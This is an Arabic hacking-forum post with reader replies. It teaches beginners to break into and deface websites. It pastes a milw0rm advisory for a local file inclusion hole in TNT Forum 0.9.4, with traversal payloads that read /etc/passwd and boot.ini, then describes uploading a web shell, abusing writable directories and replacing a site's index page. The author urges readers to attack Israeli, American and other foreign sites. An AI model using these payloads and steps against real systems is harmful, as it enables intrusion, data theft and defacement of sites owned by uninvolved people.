بسم الله الرحمن الرحيم السلام عليكم جميعآ هذي اول مشاركه لي بالمنتدا الحلو حبيت اشارك بشي حلو للمنتدا الحلو <اقول لا يكثر هههههههه ابيك تركز زين وتفهمني ..قفل المسن والجوال كمان واذا فيه احد عندك بالغرفه طلعه وخليك بجو هاااااااادئ عشان تركز<~~ماتحس انك طولتها هههههههه يالله..^_^ بـسم آلله _- نبدأ-_ آول شي لآزم نعرف آلموقع على آي سيرفر والسيرفر معنآه ( خآدم ) ونطلع آلآي بي (ip) آلموووقع رآح تقولي يااستكنان كيف آطلع كل هذا ؟؟ آقولك روح لي (( آبدأ (start) ــــ> وبعدين لي تشغيل (ren) ـــ> بعدين آكتب cmd رآح تطلع لك شآشه سودآ بعين آكتب ping وبعدين رآبط آلموقع بدون (vb) ولآ(http) يعني كذا ping www.xxxx.com ولاتنسى آلمسآفه بين ping ورآبط آلموقع _-_-_-_-_-_-_-_-_-_-_-_-_-_- وبعدين تطلع لك آرقآم كثيره كلهآ نفس الشي خذ آول آلآرقآم وحفظه وبعدين روح لي www.live.com آو www.msn.com وكتب كذا : ip:XXXXXXXXX علمآ آن XXXXX آي بي آلموقع ( ip) آلحين طلعنآ آلسيرفر وخلصنآ رآح تقولي شلون آبي آخترق آلحين ؟؟؟؟؟؟؟؟؟؟؟؟ آقولك يآطويل العمر روح للموقع هذا : http://www.milw0rm.com/×××apps.php ودور آخر آلثغرآآت ورآح تقولي آنآ لقيت ثغره وشلون آخترق آلموقع آلحين .؟.؟ آقولك آدخل على آول وحد يعني آول موضوع رآح تطلع لك شآشه بيضآء مكتوب عليهآ نفس كذآ : ================================================== ==== TNT Forum 0.9.4 Local File Inclusion Vulnerabilities ================================================== ==== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 10 June 2008 SITE : www.citec.us ################################################## ### APPLICATION : TNT Forum VERSION : 0.9.4 DOWNLOAD : download.tntforum.tuttoeniente.net ################################################## ### ---LFI--- ################################################## ############### Vulnerable in index.php: 137: //Variabili generali 138: $modulo = @$____['modulo']; 139: $modfile = 'mod_'.$modulo.'.php'; ################################################## ############### Exploit: [+] For Windows http://[Tar___]/[tntforum_path]/index.php?modulo=../../../../../../../../boot.ini%00 [+] For Linux http://localhost/tntforum/index.php?.../etc/passwd%00 ################################################## ################ # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################## ################ # milw0rm.com [2008-06-10] آدري آنك مآفهمت شي آلحين روح دور على كلمة : Example آذآ لقيتهآ رآح تلقآ جنبهآ آو تحتها آستغلال آلثغره ( آلآستغلال هو آهم شي ومآيحتآج شرح ) وهذآ هو آلآستغلال : http://localhost/tntforum/index.php?.../etc/passwd%00 هذآ تحطه بعد رآبط آلموقع على طول يعني يصير كذآ : http://xxxx.com/tntforum/index.php?m.../etc/passwd%00 علمآ آن آخر كلمة بعد علآمه = هذي=../../../../../../../../الشل ولآ تنسى تكتب آخر شي "؟" علامة ؟ هي آهم شي هالعلامه (؟) نفضر آننآ طلعنآ آلسيرفر وطلعنآ آلآي بي ip وطلعنآ آلثغره وآلآستغلآل نفتضر آن آلرآبط طلع خطأ!!!! معنآتهآ آن آلثغره مرقعه يعني مآيصير تروح لي للموضوع آلثآني وآنت تدوور على آلآستغلال آلحين آنت تقولي من وين آجيب آلشل ؟. آقول روح دور بمواضيع المنتدا تلقا _-__-_-_-_-_-_--_--_------ آنت آلحين تقولي آنآ رفعت آلشل آلحين وش آسوي ؟؟؟؟؟؟؟؟؟؟ووش آلفآيده آلحين .؟؟؟؟؟ وش آلفآيده ؟ آنك آلحين تشوف كل ملفآت آلموقع بس وتحذف وتعدل بس بشرط !!!!! آذآ كآنت حآلتك root على آلسيرفر فأنت آلملك آلحين ! وذآ كآنت حآلتك user فآنت وزير الملك وآذآ كآنت حآلتك nbode فآنت زآئر مآتقدر تعدل ولآ تحذف آلآعلى آلموقع آلي عليها تصريح (777) تقدر تسوي آلي تبي ! وتقولي شلون آدري آن فيه موآقع عليها تصريح (777) آقولك رآح يكون لونهآ آخضر ! ولحين رآح تقولي وش آسوي آبي آخترق آلموقع ! رآح آقولك آدخل على آلموقع آلي تبيه وبعدين روح لي UP وبعدين آستعرآض وبعدين آندكس آلآخترآآآآآق ________________________________ ومبروووووووووووووووووك آخترقت آلموقع هذا الي عندي <<~~~اذا عجبكم الموضوع لا تبخلو بالتقييم ارجو ان التجريب يكون ع مواقع اسرائليه ولا امريكيه ولا اجنبيه اهم شي اني ابري نفسي مع السلامهـ اهدااء لمنتدى جيوش الهكرز
الشرح على السريع وياكثر الغمووض بالشرح السرعه مو زينه خلك على البطيئ
يعطيكي ربي الف الف عآآآآآآفية مشكووووورة على الشرح ،، تحياتي
chokran a khouya
الله يعطك الف عافيه طرح جميل بس الله يهدك مسرع بشرح موفق يارب
اشهد ان لا اله الا الله وان محمد رسول الله http://www.aljyyosh.com/vb/showthread.php?t=25438 افضل موقع www.livequran.org
للاسف شرح قديم حييييييل ع العموم مشكور يالغلا
مشكوووووور اخي بس على فكرة موضوعك منقول الرجاء ذكر المصدر في المرة القادمة و شكراااا تحياتي
مشكوووووووووووووووووووووو ووووووور
مشكووووووووووووور
الشرح ممتاز
قوانين المنتدى
